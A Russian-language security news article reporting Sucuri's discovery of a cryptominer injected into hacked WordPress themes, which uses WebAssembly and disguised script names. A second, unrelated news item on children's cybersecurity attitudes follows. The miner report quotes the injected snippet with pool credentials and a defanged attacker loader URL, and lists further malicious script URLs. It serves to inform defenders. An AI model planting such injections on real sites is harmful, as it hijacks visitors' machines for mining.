Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly
Главная » Новости

Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Татьяна Никитина 26 Июля 2022 - 16:26
...
Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Эксперты Sucuri обнаружили необычный JavaScript-майнер, загружаемый на страницы при посещении взломанного сайта. Злоумышленники используют технологию WebAssembly, чтобы ускорить исполнение сценария и осложнить выявление вредоносных инъекций.

Бинарный формат WebAssembly (.wasm), позволяющий выполнять высокопроизводительные приложения на веб-страницах со скоростью, близкой к нативной, в настоящее время поддерживают более 95% установленных браузеров, в том числе Google Chrome, Microsoft Edge, Safari, Firefox и Opera. Код Wasm загружается и запускается из JavaScript и может работать в параллель в той же песочнице, обмениваясь данными с кодом JavaScript.

В Sucuri узнали о нововведении криптоджекеров, когда новый клиент запросил помощи— его компьютер начал сильно тормозить при подключении к персональному сайту WordPress. Беглый просмотр файлов на сайте выявил небольшой фрагмент кода, вставленный в один из файлов темы:

localStorage.setItem('f', 'auto.config({ login: "6110659", pass: "auto" }).power(10);');localStorage.setItem('s', 'hxxps://wm[.]bmwebm[.]org/auto.js');

Каждый раз, когда посетитель заходит на веб-страницу, этот сниппет загружает на стороне клиента скрипт auto.js из домена wm[.]bmwebm[.]org. Содержимое JavaScript-файла оказалось обфусцированным с помощью CharCode; декодирование показало, что это криптомайнер, стартующий при каждом визите на сайт.

Вшитые учетные данные, по всей видимости, используются для доступа к кастомному пулу в том же домене. Особый интерес у исследователей вызвала такая находка, как использование WebAssembly для запуска бинарного кода в среде браузера.

 

Расшифрованный auto.js также содержал инструкции для операций майнинга, которые исполняются в браузере вместе с JavaScript.

Позднее тот же самый криптомайнер был обнаружен на другом взломанном сайте, но уже под именем adservicegoogle.js. Он загружался из того же домена и пытался выдать себя за легитимный скрипт Google Ads.

Домен hxxps://wm[.]bmwebm[.]org/ был зарегистрирован в январе 2021 года, то есть полтора года криптоджекерам удавалось остаться незамеченными. В настоящее время (на 26 июля) их майнер работает на 195 сайтах, в том числе в TLD-зоне RU; по всей видимости, скромный масштаб киберкампании тоже помог злоумышленникам оставаться в тени.

Примечательно, что отдаваемые вредоносные JavaScript-файлы генерируются автоматически — злоумышленники просто меняют имя, добавляемое к домену:

  • hxxps://wm[.]bmwebm[.]org/wordpresscore.js
  • hxxps://wm[.]bmwebm[.]org/common.js
  • hxxps://wm[.]bmwebm[.]org/facebook-sdk.js
  • hxxps://wm[.]bmwebm[.]org/twitter.js
  • hxxps://wm[.]bmwebm[.]org/node.js

Реализованная функциональность также позволяет внедрять скрипты в разные места на зараженном сайте и поддерживать видимость легитимности инъекций.

Эксперты ожидают расширения использования WebAssembly киберкриминалом, несмотря на очевидное ограничение — зависимость от JavaScript. Код Wasm не способен самостоятельно собирать данные, подключаться к интернету и сливать награбленное на сторону. В составе веб-скимера, например, такой компонент может диктовать JavaScript, на каких веб-формах сосредоточиться, какой домен использовать для вывода данных и т. п. 

Использование Wasm, по словам Sucuri, способно затруднить выявление злонамеренных редиректоров, вредоносной рекламы, ложной техподдержки, скриптовых кейлоггеров, скрытых загрузок (drive-by) и других неблаговидных способов использования браузера. В тех случаях, когда браузер содержит уязвимость 0-day, оперирующий Wasm злоумышленник может причинить еще больше вреда — путем использования бинарного кода для эксплойта, и такую функциональность вряд ли обнаружит антивирусный сканер, заточенный под строковый анализ.

На сайтах подобные заражения тоже трудно выявить, если не с чем сравнить (нет бэкапа). Там, где Wasm уже используется в повседневных операциях, задача еще больше усложняется. Предотвратить инфицирование, по мнению экспертов, помогут следующие меры:

  • поддержка всего софта (CMS, плагинов, тем) в актуальном состоянии;
  • усиление защиты сайта и админ-панелей от брутфорса и словарных атак;
  • создание бэкапа и регулярное копирование контента и базы данных, с сохранением резервных копий вне сайта;
  • регулярные проверки целостности содержимого файлов на сайте;
  • использование средств фильтрации трафика прикладного уровня (WAF).
Следующая главная новость »
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Лишь 26% детей доверяет родителям в вопросах кибербезопасности
Яков Шпунт 24 Апреля 2025 - 12:59
МошенничествоОнлайн-мошенничество Домашние пользователи ГК «Солар»
Лишь 26% детей доверяет родителям в вопросах кибербезопасности

Исследование ГК «Солар» показало, что лишь 26% детей доверяют родителям в вопросах кибербезопасности, несмотря на низкий уровень собственной осведомлённости об угрозах. При этом 82% родителей уверены, что именно они способны защитить своих детей от рисков в интернете.

Согласно данным опроса, 82% родителей считают себя ответственными за цифровую безопасность своих детей. Среди матерей этот показатель достигает 85%. Однако только 26% детей разделяют это мнение. При этом 61% подростков считают, что в состоянии самостоятельно обеспечить себе кибербезопасность.

Тем не менее 45% детей и подростков не могут чётко сформулировать, что такое кибербезопасность. Чаще всего они ассоциируют её с защитой и отсутствием опасностей в интернете. Лишь 8% связывают её с сохранностью личных данных, а 7% — с защитой от мошенников и хакеров. Кроме того, почти треть опрошенных не понимает, что меры безопасности необходимо соблюдать при каждом входе в интернет.

Хотя 90% родителей осознают существование цифровых угроз, многим из них трудно донести эту информацию до детей. При этом 70% родителей считают социальные сети полностью безопасными, а 59% — не видят рисков в онлайн-играх, несмотря на то что в них часто требуется вводить личные данные. Игры также активно используются в атаках: под их видом нередко распространяют вредоносное программное обеспечение. Причём иногда заражённые игры попадают даже в официальные сервисы дистрибуции.

Лишь четверть детей полагаются на родителей в вопросах безопасности в интернете, тогда как 61% считают это личной ответственностью. Среди родителей 82% берут ответственность на себя, а 41% считают, что отвечать за безопасность должны владельцы онлайн-ресурсов. С этим согласны 26% детей и подростков.

«Киберграмотность — это результат диалога поколений, которые должны делиться друг с другом навыками и знаниями. Чтобы повысить цифровую осведомлённость детей, необходимо объединить усилия родителей, общества, бизнеса и государства. Исследования показывают, что многие школьники понимают важность этих вопросов, но не всегда знают, что делать. Поэтому важно обучать их основам кибергигиены, чтобы они осознавали свою ответственность. Сейчас особенно важно создать надёжную образовательную платформу, посвящённую общей кибербезопасности. Бизнес может помочь, предлагая интересные и интерактивные курсы, которые научат молодёжь основам безопасности и развивают критическое мышление», — говорит Марина Овсянникова, директор по маркетингу и PR ГК «Солар».

«По нашим данным, доля детей и подростков, столкнувшихся с мошенничеством, выросла в четыре раза всего за полгода. В поисках новых путей для обмана злоумышленники делают детей точкой входа в домохозяйства. Отдельным направлением развития продуктов стали решения, направленные на повышение цифровой безопасности детско-юношеской аудитории. Анализ отдельных кейсов показывает, что часть мошеннических сценариев обрывается в тех случаях, когда ребёнок обращается к родителям или доверенным взрослым. T2 видит свою задачу не только в продуктовой и технологической защите от мошенников, но и в повышении уровня информированности. В том числе о том, что в пугающих ситуациях нормально сразу обратиться за помощью к родителям. Эксперты T2 проводят открытые уроки в школах и вебинары для молодой аудитории, чтобы повысить информированность о рисках и предоставить конкретный план действий на случай атаки злоумышленников», — рассказал Андрей Борзов, директор по продукту и клиентскому опыту T2.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.
В СёрчИнформ SIEM добавили коннектор к NGFW Континент 4
Новость
В СёрчИнформ SIEM добавили коннектор к NGFW Континент 4
Устройства не могут прослушивать разговоры для таргетинга рекламы
Новость
Устройства не могут прослушивать разговоры для таргетинга ре...
Во Франции школярам в образовательных целях разослали мошенническое письмо
Новость
Во Франции школярам в образовательных целях разослали мошенн...

RSS: Новости на портале Anti-Malware.ru

Свидетельство о регистрации СМИ ЭЛ № ФС 77 - 68398, выдано федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) 27.01.2017
Разрешается частичное использование материалов на других сайтах при наличии ссылки на источник. Использование материалов сайта с полной копией оригинала допускается только с письменного разрешения администрации.

© ООО "АМ Медиа", 2005-2025. Все права защищены.